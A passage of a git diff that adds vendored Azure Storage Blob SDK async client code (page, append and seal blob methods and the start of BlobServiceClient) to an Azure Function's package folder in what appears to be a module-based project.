length=length, + **kwargs) + try: + return await self._client.page_blob.upload_pages(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def upload_pages_from_url(self, source_url, # type: str + offset, # type: int + length, # type: int + source_offset, # type: int + **kwargs + ): + # type: (...) -> Dict[str, Any] + """ + The Upload Pages operation writes a range of pages to a page blob where + the contents are read from a URL. + + :param str source_url: + The URL of the source data. It can point to any Azure Blob or File, that is either public or has a + shared access signature attached. + :param int offset: + Start of byte range to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int source_offset: + This indicates the start of the range of bytes(inclusive) that has to be taken from the copy source. + The service will read the same number of bytes as the destination range (length-offset). + :keyword bytes source_content_md5: + If given, the service will calculate the MD5 hash of the block content and compare against this value. + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the source resource has been modified since the specified time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the source resource has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword int if_sequence_number_lte: + If the blob's sequence number is less than or equal to + the specified value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_lt: + If the blob's sequence number is less than the specified + value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_eq: + If the blob's sequence number is equal to the specified + value, the request proceeds; otherwise it fails. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + """ + + options = self._upload_pages_from_url_options( + source_url=self._encode_source_url(source_url), + offset=offset, + length=length, + source_offset=source_offset, + **kwargs + ) + try: + return await self._client.page_blob.upload_pages_from_url(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def clear_page(self, offset, length, **kwargs): + # type: (int, int, Any) -> Dict[str, Union[str, datetime]] + """Clears a range of pages. + + :param int offset: + Start of byte range to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword int if_sequence_number_lte: + If the blob's sequence number is less than or equal to + the specified value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_lt: + If the blob's sequence number is less than the specified + value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_eq: + If the blob's sequence number is equal to the specified + value, the request proceeds; otherwise it fails. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._clear_page_options(offset, length, **kwargs) + try: + return await self._client.page_blob.clear_pages(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def append_block( # type: ignore + self, data, # type: Union[AnyStr, Iterable[AnyStr], IO[AnyStr]] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime, int]] + """Commits a new block of data to the end of the existing append blob. + + :param data: + Content of the block. + :param int length: + Size of the block in bytes. + :keyword bool validate_content: + If true, calculates an MD5 hash of the block content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int appendpos_condition: + Optional conditional header, used only for the Append Block operation. + A number indicating the byte offset to compare. Append Block will + succeed only if the append position is equal to this number. If it + is not, the request will fail with the AppendPositionConditionNotMet error + (HTTP status code 412 - Precondition Failed). + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword str encoding: + Defaults to UTF-8. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag, last modified, append offset, committed block count). + :rtype: dict(str, Any) + """ + options = self._append_block_options( + data, + length=length, + **kwargs + ) + try: + return await self._client.append_blob.append_block(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async() + async def append_block_from_url(self, copy_source_url, # type: str + source_offset=None, # type: Optional[int] + source_length=None, # type: Optional[int] + **kwargs): + # type: (...) -> Dict[str, Union[str, datetime, int]] + """ + Creates a new block to be committed as part of a blob, where the contents are read from a source url. + + :param str copy_source_url: + The URL of the source data. It can point to any Azure Blob or File, that is either public or has a + shared access signature attached. + :param int source_offset: + This indicates the start of the range of bytes(inclusive) that has to be taken from the copy source. + :param int source_length: + This indicates the end of the range of bytes that has to be taken from the copy source. + :keyword bytearray source_content_md5: + If given, the service will calculate the MD5 hash of the block content and compare against this value. + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int appendpos_condition: + Optional conditional header, used only for the Append Block operation. + A number indicating the byte offset to compare. Append Block will + succeed only if the append position is equal to this number. If it + is not, the request will fail with the + AppendPositionConditionNotMet error + (HTTP status code 412 - Precondition Failed). + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the source resource has been modified since the specified time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the source resource has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + """ + options = self._append_block_from_url_options( + copy_source_url=self._encode_source_url(copy_source_url), + source_offset=source_offset, + source_length=source_length, + **kwargs + ) + try: + return await self._client.append_blob.append_block_from_url(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async() + async def seal_append_blob(self, **kwargs): + # type: (...) -> Dict[str, Union[str, datetime, int]] + """The Seal operation seals the Append Blob to make it read-only. + + .. versionadded:: 12.4.0 + + :keyword int appendpos_condition: + Optional conditional header, used only for the Append Block operation. + A number indicating the byte offset to compare. Append Block will + succeed only if the append position is equal to this number. If it + is not, the request will fail with the AppendPositionConditionNotMet error + (HTTP status code 412 - Precondition Failed). + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag, last modified, append offset, committed block count). + :rtype: dict(str, Any) + """ + options = self._seal_append_blob_options(**kwargs) + try: + return await self._client.append_blob.seal(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _get_container_client(self): # pylint: disable=client-method-missing-kwargs + # type: (...) -> ContainerClient + """Get a client to interact with the blob's parent container. + + The container need not already exist. Defaults to current blob's credentials. + + :returns: A ContainerClient. + :rtype: ~azure.storage.blob.ContainerClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START get_container_client_from_blob_client] + :end-before: [END get_container_client_from_blob_client] + :language: python + :dedent: 12 + :caption: Get container client from blob object. + """ + from ._container_client_async import ContainerClient + if not isinstance(self._pipeline._transport, AsyncTransportWrapper): # pylint: disable = protected-access + _pipeline = AsyncPipeline( + transport=AsyncTransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + else: + _pipeline = self._pipeline # pylint: disable = protected-access + return ContainerClient( + "{}://{}".format(self.scheme, self.primary_hostname), container_name=self.container_name, + credential=self._raw_credential, api_version=self.api_version, _configuration=self._config, + _location_mode=self._location_mode, _hosts=self._hosts, require_encryption=self.require_encryption, + _pipeline=_pipeline, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_blob_service_client_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_blob_service_client_async.py new file mode 100644 index 0000000..3b740b9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_blob_service_client_async.py @@ -0,0 +1,682 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=invalid-overridden-method +import functools +import warnings +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, Dict, List, + TYPE_CHECKING +) + +from azure.core.exceptions import HttpResponseError +from azure.core.tracing.decorator import distributed_trace +from azure.core.pipeline import AsyncPipeline +from azure.core.tracing.decorator_async import distributed_trace_async +from azure.core.async_paging import AsyncItemPaged + +from .._shared.models import LocationMode +from .._shared.policies_async import ExponentialRetry +from .._shared.base_client_async import AsyncStorageAccountHostsMixin, AsyncTransportWrapper +from .._shared.response_handlers import return_response_headers, process_storage_error +from .._shared.parser import _to_utc_datetime +from .._shared.response_handlers import parse_to_internal_user_delegation_key +from .._generated.aio import AzureBlobStorage +from .._generated.models import StorageServiceProperties, KeyInfo +from .._blob_service_client import BlobServiceClient as BlobServiceClientBase +from ._container_client_async import ContainerClient +from ._blob_client_async import BlobClient +from .._models import ContainerProperties +from .._deserialize import service_stats_deserialize, service_properties_deserialize +from .._serialize import get_api_version +from ._models import ContainerPropertiesPaged, FilteredBlobPaged + +if TYPE_CHECKING: + from datetime import datetime + from .._shared.models import AccountSasPermissions, ResourceTypes, UserDelegationKey + from ._lease_async import BlobLeaseClient + from .._models import ( + BlobProperties, + PublicAccess, + BlobAnalyticsLogging, + Metrics, + CorsRule, + RetentionPolicy, + StaticWebsite, + ) + + +class BlobServiceClient(AsyncStorageAccountHostsMixin, BlobServiceClientBase): + """A client to interact with the Blob Service at the account level. + + This client provides operations to retrieve and configure the account properties + as well as list, create and delete containers within the account. + For operations relating to a specific container or blob, clients for those entities + can also be retrieved using the `get_client` functions. + + :param str account_url: + The URL to the blob storage account. Any other entities included + in the URL path (e.g. container or blob) will be discarded. This URL can be optionally + authenticated with a SAS token. + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword str api_version: + The Storage API version to use for requests. Default value is the most recent service version that is + compatible with the current SDK. Setting to an older version may result in reduced feature compatibility. + + .. versionadded:: 12.2.0 + + :keyword str secondary_hostname: + The hostname of the secondary endpoint. + :keyword int max_block_size: The maximum chunk size for uploading a block blob in chunks. + Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_put_size: If the blob size is less than or equal max_single_put_size, then the blob will be + uploaded with only one http PUT request. If the blob size is larger than max_single_put_size, + the blob will be uploaded in chunks. Defaults to 64*1024*1024, or 64MB. + :keyword int min_large_block_upload_threshold: The minimum chunk size required to use the memory efficient + algorithm when uploading a block blob. Defaults to 4*1024*1024+1. + :keyword bool use_byte_buffer: Use a byte buffer for block blob uploads. Defaults to False. + :keyword int max_page_size: The maximum chunk size for uploading a page blob. Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_get_size: The maximum size for a blob to be downloaded in a single call, + the exceeded part will be downloaded in chunks (could be parallel). Defaults to 32*1024*1024, or 32MB. + :keyword int max_chunk_get_size: The maximum chunk size used for downloading a blob. Defaults to 4*1024*1024, + or 4MB. + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_authentication_async.py + :start-after: [START create_blob_service_client] + :end-before: [END create_blob_service_client] + :language: python + :dedent: 8 + :caption: Creating the BlobServiceClient with account url and credential. + + .. literalinclude:: ../samples/blob_samples_authentication_async.py + :start-after: [START create_blob_service_client_oauth] + :end-before: [END create_blob_service_client_oauth] + :language: python + :dedent: 8 + :caption: Creating the BlobServiceClient with Azure Identity credentials. + """ + + def __init__( + self, account_url, # type: str + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> None + kwargs['retry_policy'] = kwargs.get('retry_policy') or ExponentialRetry(**kwargs) + super(BlobServiceClient, self).__init__( + account_url, + credential=credential, + **kwargs) + self._client = AzureBlobStorage(self.url, base_url=self.url, pipeline=self._pipeline) + self._client._config.version = get_api_version(kwargs) # pylint: disable=protected-access + + @distributed_trace_async + async def get_user_delegation_key(self, key_start_time, # type: datetime + key_expiry_time, # type: datetime + **kwargs # type: Any + ): + # type: (...) -> UserDelegationKey + """ + Obtain a user delegation key for the purpose of signing SAS tokens. + A token credential must be present on the service object for this request to succeed. + + :param ~datetime.datetime key_start_time: + A DateTime value. Indicates when the key becomes valid. + :param ~datetime.datetime key_expiry_time: + A DateTime value. Indicates when the key stops being valid. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: The user delegation key. + :rtype: ~azure.storage.blob.UserDelegationKey + """ + key_info = KeyInfo(start=_to_utc_datetime(key_start_time), expiry=_to_utc_datetime(key_expiry_time)) + timeout = kwargs.pop('timeout', None) + try: + user_delegation_key = await self._client.service.get_user_delegation_key(key_info=key_info, + timeout=timeout, + **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + return parse_to_internal_user_delegation_key(user_delegation_key) # type: ignore + + @distributed_trace_async + async def get_account_information(self, **kwargs): + # type: (Any) -> Dict[str, str] + """Gets information related to the storage account. + + The information can also be retrieved if the user has a SAS to a container or blob. + The keys in the returned dictionary include 'sku_name' and 'account_kind'. + + :returns: A dict of account information (SKU and account type). + :rtype: dict(str, str) + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START get_blob_service_account_info] + :end-before: [END get_blob_service_account_info] + :language: python + :dedent: 12 + :caption: Getting account information for the blob service. + """ + try: + return await self._client.service.get_account_info(cls=return_response_headers, **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def get_service_stats(self, **kwargs): + # type: (Any) -> Dict[str, Any] + """Retrieves statistics related to replication for the Blob service. + + It is only available when read-access geo-redundant replication is enabled for + the storage account. + + With geo-redundant replication, Azure Storage maintains your data durable + in two locations. In both locations, Azure Storage constantly maintains + multiple healthy replicas of your data. The location where you read, + create, update, or delete data is the primary storage account location. + The primary location exists in the region you choose at the time you + create an account via the Azure Management Azure classic portal, for + example, North Central US. The location to which your data is replicated + is the secondary location. The secondary location is automatically + determined based on the location of the primary; it is in a second data + center that resides in the same region as the primary location. Read-only + access is available from the secondary location, if read-access geo-redundant + replication is enabled for your storage account. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: The blob service stats. + :rtype: Dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START get_blob_service_stats] + :end-before: [END get_blob_service_stats] + :language: python + :dedent: 12 + :caption: Getting service stats for the blob service. + """ + timeout = kwargs.pop('timeout', None) + try: + stats = await self._client.service.get_statistics( # type: ignore + timeout=timeout, use_location=LocationMode.SECONDARY, **kwargs) + return service_stats_deserialize(stats) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def get_service_properties(self, **kwargs): + # type: (Any) -> Dict[str, Any] + """Gets the properties of a storage account's Blob service, including + Azure Storage Analytics. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An object containing blob service properties such as + analytics logging, hour/minute metrics, cors rules, etc. + :rtype: Dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START get_blob_service_properties] + :end-before: [END get_blob_service_properties] + :language: python + :dedent: 12 + :caption: Getting service properties for the blob service. + """ + timeout = kwargs.pop('timeout', None) + try: + service_props = await self._client.service.get_properties(timeout=timeout, **kwargs) + return service_properties_deserialize(service_props) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def set_service_properties( + self, analytics_logging=None, # type: Optional[BlobAnalyticsLogging] + hour_metrics=None, # type: Optional[Metrics] + minute_metrics=None, # type: Optional[Metrics] + cors=None, # type: Optional[List[CorsRule]] + target_version=None, # type: Optional[str] + delete_retention_policy=None, # type: Optional[RetentionPolicy] + static_website=None, # type: Optional[StaticWebsite] + **kwargs + ): + # type: (...) -> None + """Sets the properties of a storage account's Blob service, including + Azure Storage Analytics. + + If an element (e.g. analytics_logging) is left as None, the + existing settings on the service for that functionality are preserved. + + :param analytics_logging: + Groups the Azure Analytics Logging settings. + :type analytics_logging: ~azure.storage.blob.BlobAnalyticsLogging + :param hour_metrics: + The hour metrics settings provide a summary of request + statistics grouped by API in hourly aggregates for blobs. + :type hour_metrics: ~azure.storage.blob.Metrics + :param minute_metrics: + The minute metrics settings provide request statistics + for each minute for blobs. + :type minute_metrics: ~azure.storage.blob.Metrics + :param cors: + You can include up to five CorsRule elements in the + list. If an empty list is specified, all CORS rules will be deleted, + and CORS will be disabled for the service. + :type cors: list[~azure.storage.blob.CorsRule] + :param str target_version: + Indicates the default version to use for requests if an incoming + request's version is not specified. + :param delete_retention_policy: + The delete retention policy specifies whether to retain deleted blobs. + It also specifies the number of days and versions of blob to keep. + :type delete_retention_policy: ~azure.storage.blob.RetentionPolicy + :param static_website: + Specifies whether the static website feature is enabled, + and if yes, indicates the index document and 404 error document to use. + :type static_website: ~azure.storage.blob.StaticWebsite + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START set_blob_service_properties] + :end-before: [END set_blob_service_properties] + :language: python + :dedent: 12 + :caption: Setting service properties for the blob service. + """ + if all(parameter is None for parameter in [ + analytics_logging, hour_metrics, minute_metrics, cors, + target_version, delete_retention_policy, static_website]): + raise ValueError("set_service_properties should be called with at least one parameter") + + props = StorageServiceProperties( + logging=analytics_logging, + hour_metrics=hour_metrics, + minute_metrics=minute_metrics, + cors=cors, + default_service_version=target_version, + delete_retention_policy=delete_retention_policy, + static_website=static_website + ) + timeout = kwargs.pop('timeout', None) + try: + await self._client.service.set_properties(props, timeout=timeout, **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def list_containers( + self, name_starts_with=None, # type: Optional[str] + include_metadata=False, # type: Optional[bool] + **kwargs + ): + # type: (...) -> AsyncItemPaged[ContainerProperties] + """Returns a generator to list the containers under the specified account. + + The generator will lazily follow the continuation tokens returned by + the service and stop when all containers have been returned. + + :param str name_starts_with: + Filters the results to return only containers whose names + begin with the specified prefix. + :param bool include_metadata: + Specifies that container metadata to be returned in the response. + The default value is `False`. + :keyword bool include_deleted: + Specifies that deleted containers to be returned in the response. This is for container restore enabled + account. The default value is `False`. + .. versionadded:: 12.4.0 + :keyword bool include_system: + Flag specifying that system containers should be included. + .. versionadded:: 12.10.0 + :keyword int results_per_page: + The maximum number of container names to retrieve per API + call. If the request does not specify the server will return up to 5,000 items. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) of ContainerProperties. + :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.storage.blob.ContainerProperties] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START bsc_list_containers] + :end-before: [END bsc_list_containers] + :language: python + :dedent: 16 + :caption: Listing the containers in the blob service. + """ + include = ['metadata'] if include_metadata else [] + include_deleted = kwargs.pop('include_deleted', None) + if include_deleted: + include.append("deleted") + include_system = kwargs.pop('include_system', None) + if include_system: + include.append("system") + timeout = kwargs.pop('timeout', None) + results_per_page = kwargs.pop('results_per_page', None) + command = functools.partial( + self._client.service.list_containers_segment, + prefix=name_starts_with, + include=include, + timeout=timeout, + **kwargs) + return AsyncItemPaged( + command, + prefix=name_starts_with, + results_per_page=results_per_page, + page_iterator_class=ContainerPropertiesPaged + ) + + @distributed_trace + def find_blobs_by_tags(self, filter_expression, **kwargs): + # type: (str, **Any) -> AsyncItemPaged[FilteredBlob] + """The Filter Blobs operation enables callers to list blobs across all + containers whose tags match a given search expression. Filter blobs + searches across all containers within a storage account but can be + scoped within the expression to a single container. + + :param str filter_expression: + The expression to find blobs whose tags matches the specified condition. + eg. "\"yourtagname\"='firsttag' and \"yourtagname2\"='secondtag'" + To specify a container, eg. "@container='containerName' and \"Name\"='C'" + :keyword int results_per_page: + The max result per page when paginating. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) response of BlobProperties. + :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.storage.blob.FilteredBlob] + """ + + results_per_page = kwargs.pop('results_per_page', None) + timeout = kwargs.pop('timeout', None) + command = functools.partial( + self._client.service.filter_blobs, + where=filter_expression, + timeout=timeout, + **kwargs) + return AsyncItemPaged( + command, results_per_page=results_per_page, + page_iterator_class=FilteredBlobPaged) + + @distributed_trace_async + async def create_container( + self, name, # type: str + metadata=None, # type: Optional[Dict[str, str]] + public_access=None, # type: Optional[Union[PublicAccess, str]] + **kwargs + ): + # type: (...) -> ContainerClient + """Creates a new container under the specified account. + + If the container with the same name already exists, a ResourceExistsError will + be raised. This method returns a client with which to interact with the newly + created container. + + :param str name: The name of the container to create. + :param metadata: + A dict with name-value pairs to associate with the + container as metadata. Example: `{'Category':'test'}` + :type metadata: dict(str, str) + :param public_access: + Possible values include: 'container', 'blob'. + :type public_access: str or ~azure.storage.blob.PublicAccess + :keyword container_encryption_scope: + Specifies the default encryption scope to set on the container and use for + all future writes. + + .. versionadded:: 12.2.0 + + :paramtype container_encryption_scope: dict or ~azure.storage.blob.ContainerEncryptionScope + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: ~azure.storage.blob.aio.ContainerClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START bsc_create_container] + :end-before: [END bsc_create_container] + :language: python + :dedent: 16 + :caption: Creating a container in the blob service. + """ + container = 